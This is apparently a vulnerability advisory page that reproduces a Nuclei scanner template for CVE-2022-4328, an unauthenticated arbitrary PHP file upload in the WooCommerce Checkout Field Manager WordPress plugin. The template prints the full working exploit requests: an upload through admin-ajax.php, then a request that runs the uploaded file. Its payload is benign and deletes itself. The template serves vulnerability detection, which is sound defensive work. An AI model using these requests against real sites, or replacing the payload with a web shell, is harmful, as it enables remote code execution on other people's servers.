CVE-2022-4328: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WooCommerce Checkout Field Manager | POC: 已公开

漏洞描述

The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.

PoC代码[已公开]

id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.82956
    epss-percentile: 0.99212
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload

variables:
  string: "CVE-2022-4328"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        --------------------------22728be7b3104597--
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4a0a0047304502205c64f7ff53ef1d98923251fc3c33ab553d0a2e057cdefd1c311a7a420f8a01f3022100bddf985331283326000a9e2394c90e0dd40ac94e194573f084430c280f8effce:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4328.yaml